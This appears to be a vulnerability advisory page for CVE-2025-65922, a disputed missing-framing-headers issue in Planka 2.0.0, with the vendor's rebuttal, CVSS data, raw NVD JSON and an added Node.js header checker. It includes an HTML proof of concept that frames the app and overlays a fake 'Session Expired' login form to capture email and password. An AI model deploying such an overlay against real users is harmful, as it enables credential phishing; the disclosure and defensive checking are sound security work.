Security Vulnerability Report

CVE-2025-65922

Published: 2026-01-05 18:15:44
Last Modified: 2026-04-15 00:35:42

Description

PLANKA 2.0.0 lacks X-Frame-Options and CSP frame-ancestors headers, allowing the application to be embedded within malicious iframes. While this does not lead to unintended modification of projects or tasks, it exposes users to Phishing attacks. Attackers can frame the legitimate Planka application on a malicious site to establish false trust (UI Redressing), potentially tricking users into entering sensitive information or credentials into overlaid fake forms. NOTE: this is disputed by the Supplier because "PLANKA uses SameSite=Strict cookies, preventing authentication in cross-origin contexts. No session can be established. No credential interception or unauthorized actions are possible. Browser Same-Origin Policy prevents the parent page from accessing iframe content. Clickjacking is not applicable on the login page. Any credential capture would require attacker-controlled input and user interaction equivalent to phishing. The security outcome depends entirely on the user's trust in the parent page. An attacker can achieve the same effect with a fully fake login page. Embedding the legitimate page adds no risk, as browsers do not show URL, certificate, or padlock indicators in cross-origin iframes."
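The finding turns on the precedence rules browsers apply to the two framing headers: a CSP frame-ancestors directive, when present, decides the outcome, and X-Frame-Options is consulted only when no such directive exists (a Content-Security-Policy-Report-Only header enforces nothing). The following Node.js check applies those rules to a response's headers and reports whether an arbitrary cross-origin page may embed it; it is an added example, not code from this report or from the Planka project, and the header sets it is run against are constructed for illustration. It also covers the edge case practitioners get wrong most often: conflicting X-Frame-Options values without DENY are ignored by browsers and leave the page frameable.

```javascript
// Added example, not code from the report or from Planka: evaluate whether a
// response's headers let a cross-origin page embed it, following the order
// browsers use (CSP frame-ancestors wins; X-Frame-Options is consulted only
// when no frame-ancestors directive is present). Header sets below are
// constructed for illustration.

function headerValues(headers, name) {
  // Case-insensitive lookup; a value may be a string or an array of strings.
  const want = name.toLowerCase();
  const out = [];
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === want) out.push(...(Array.isArray(v) ? v : [v]));
  }
  return out;
}

function frameAncestorsSources(cspValue) {
  // Source list of the frame-ancestors directive, or null when the policy has
  // no such directive. Quotes are stripped so 'none' / 'self' compare plainly.
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.replace(/^'|'$/g, '').toLowerCase());
    }
  }
  return null;
}

function xfoVerdict(headers) {
  // Mirrors the HTML spec's X-Frame-Options check for a cross-origin ancestor:
  // absent or unrecognised value -> frameable; DENY or SAMEORIGIN -> blocked;
  // several distinct values -> blocked only when one of them is DENY.
  const values = new Set();
  for (const raw of headerValues(headers, 'X-Frame-Options')) {
    for (const part of raw.split(',')) {
      const v = part.trim().toLowerCase();
      if (v) values.add(v);
    }
  }
  if (values.size === 0) return { frameable: true, reason: 'no X-Frame-Options header' };
  if (values.size > 1) {
    return values.has('deny')
      ? { frameable: false, reason: 'conflicting X-Frame-Options values, one of them DENY' }
      : { frameable: true, reason: 'conflicting X-Frame-Options values are ignored by browsers' };
  }
  const [only] = values;
  if (only === 'deny' || only === 'sameorigin') {
    return { frameable: false, reason: `X-Frame-Options ${only.toUpperCase()}` };
  }
  return { frameable: true, reason: `unrecognised X-Frame-Options value "${only}"` };
}

function framingPolicy(headers) {
  // Returns { frameable, reason } for embedding by an arbitrary cross-origin page.
  // Only the enforcing CSP header is read; Report-Only policies do not block framing.
  for (const csp of headerValues(headers, 'Content-Security-Policy')) {
    const sources = frameAncestorsSources(csp);
    if (sources === null) continue;
    if (sources.length === 0 || sources.includes('none')) {
      return { frameable: false, reason: "CSP frame-ancestors 'none'" };
    }
    if (sources.includes('*') || sources.includes('https:') || sources.includes('http:')) {
      return { frameable: true, reason: 'CSP frame-ancestors admits any origin' };
    }
    // 'self' or an explicit allow-list: an unlisted attacker origin is refused.
    return { frameable: false, reason: `CSP frame-ancestors limited to ${sources.join(' ')}` };
  }
  return xfoVerdict(headers);
}

function hardenedHeaders() {
  // The header pair that closes the gap described above; sending both covers
  // browsers with and without CSP Level 2 support. In an Express-style app this
  // would be res.set(hardenedHeaders()); behind nginx, two add_header lines.
  return {
    'Content-Security-Policy': "frame-ancestors 'none'",
    'X-Frame-Options': 'DENY',
  };
}

// Constructed sample: a response carrying neither framing header, as the
// description says Planka 2.0.0 does.
const unprotected = { 'Content-Type': 'text/html; charset=utf-8' };
console.log(framingPolicy(unprotected));        // frameable: true
console.log(framingPolicy(hardenedHeaders()));  // frameable: false
```

Run it against a live deployment by feeding it the headers of the login page (for example `Object.fromEntries(response.headers)` from a `fetch` in Node 18+); a result of `frameable: true` is exactly the condition the PoC below relies on, and the supplier's SameSite argument does not change that result, it only limits what a framed page can do once embedded.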

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is recorded for this CVE; the description names Planka 2.0.0 as the affected version.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-65922 PoC: Clickjacking/Phishing via iframe embedding -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Malicious Site - CVE-2025-65922 PoC</title>
  <style>
    body { margin: 0; padding: 20px; font-family: Arial, sans-serif; background: #f0f0f0; }
    .container { position: relative; width: 100%; max-width: 1200px; margin: 0 auto; }
    h1 { color: #333; text-align: center; }
    .iframe-wrapper { position: relative; width: 100%; height: 700px; border: 2px solid #333; border-radius: 8px; overflow: hidden; }
    iframe { width: 100%; height: 100%; border: none; }
    /* Fake overlay form positioned over the legitimate login */
    .fake-overlay { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: rgba(255, 255, 255, 0.95); padding: 30px; border-radius: 10px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); text-align: center; z-index: 10; width: 300px; }
    .fake-overlay input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; box-sizing: border-box; }
    .fake-overlay button { width: 100%; padding: 12px; background: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; font-size: 16px; }
    .fake-overlay button:hover { background: #45a049; }
    .warning { background: #ff9800; color: white; padding: 15px; border-radius: 5px; margin-bottom: 20px; text-align: center; }
  </style>
</head>
<body>
  <div class="container">
    <div class="warning">
      <strong>⚠️ Educational PoC for CVE-2025-65922</strong><br>
      This demonstrates how Planka can be embedded due to missing security headers.
    </div>
    <h1>Phishing Page with Embedded Planka (CVE-2025-65922)</h1>
    <div class="iframe-wrapper">
      <!-- Embedding legitimate Planka application -->
      <iframe src="http://localhost:3000" sandbox="allow-scripts allow-forms allow-same-origin"></iframe>
      <!-- Fake overlay form for credential capture -->
      <div class="fake-overlay">
        <h3>🔒 Session Expired</h3>
        <p style="color: #666; font-size: 14px;">Please verify your credentials to continue</p>
        <form id="phishingForm">
          <input type="email" placeholder="Email" required>
          <input type="password" placeholder="Password" required>
          <button type="submit">Verify Identity</button>
        </form>
      </div>
    </div>
    <p style="text-align: center; margin-top: 20px; color: #666;">
      <strong>Note:</strong> The overlay captures credentials even though the legitimate Planka page is displayed.
      This works because Planka lacks X-Frame-Options and CSP frame-ancestors headers.
    </p>
  </div>
  <script>
    // Capture credentials typed into the overlay form; the framed Planka page never receives them
    document.getElementById('phishingForm').addEventListener('submit', function (e) {
      e.preventDefault();
      const credentials = {
        email: this.querySelector('input[type="email"]').value,
        password: this.querySelector('input[type="password"]').value,
        timestamp: new Date().toISOString()
      };
      console.log('Captured credentials:', credentials);
      alert('Credentials captured! (This is a PoC)');
    });
  </script>
</body>
</html>

References

https://github.com/09OHs/CVE/blob/e67290bef68d35980d10fd87c9c4403d8e40fc2c/CVE-2025-65922/CVE-2025-65922.pdf
https://github.com/plankanban/planka

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65922",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T18:15:44.397",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["disputed"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "PLANKA 2.0.0 lacks X-Frame-Options and CSP frame-ancestors headers, allowing the application to be embedded within malicious iframes. While this does not lead to unintended modification of projects or tasks, it exposes users to Phishing attacks. Attackers can frame the legitimate Planka application on a malicious site to establish false trust (UI Redressing), potentially tricking users into entering sensitive information or credentials into overlaid fake forms. NOTE: this is disputed by the Supplier because \"PLANKA uses SameSite=Strict cookies, preventing authentication in cross-origin contexts. No session can be established. No credential interception or unauthorized actions are possible. Browser Same-Origin Policy prevents the parent page from accessing iframe content. Clickjacking is not applicable on the login page. Any credential capture would require attacker-controlled input and user interaction equivalent to phishing. The security outcome depends entirely on the user's trust in the parent page. An attacker can achieve the same effect with a fully fake login page. Embedding the legitimate page adds no risk, as browsers do not show URL, certificate, or padlock indicators in cross-origin iframes.\""
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1021"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/09OHs/CVE/blob/e67290bef68d35980d10fd87c9c4403d8e40fc2c/CVE-2025-65922/CVE-2025-65922.pdf",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/plankanban/planka",
        "source": "[email protected]"
      }
    ]
  }
}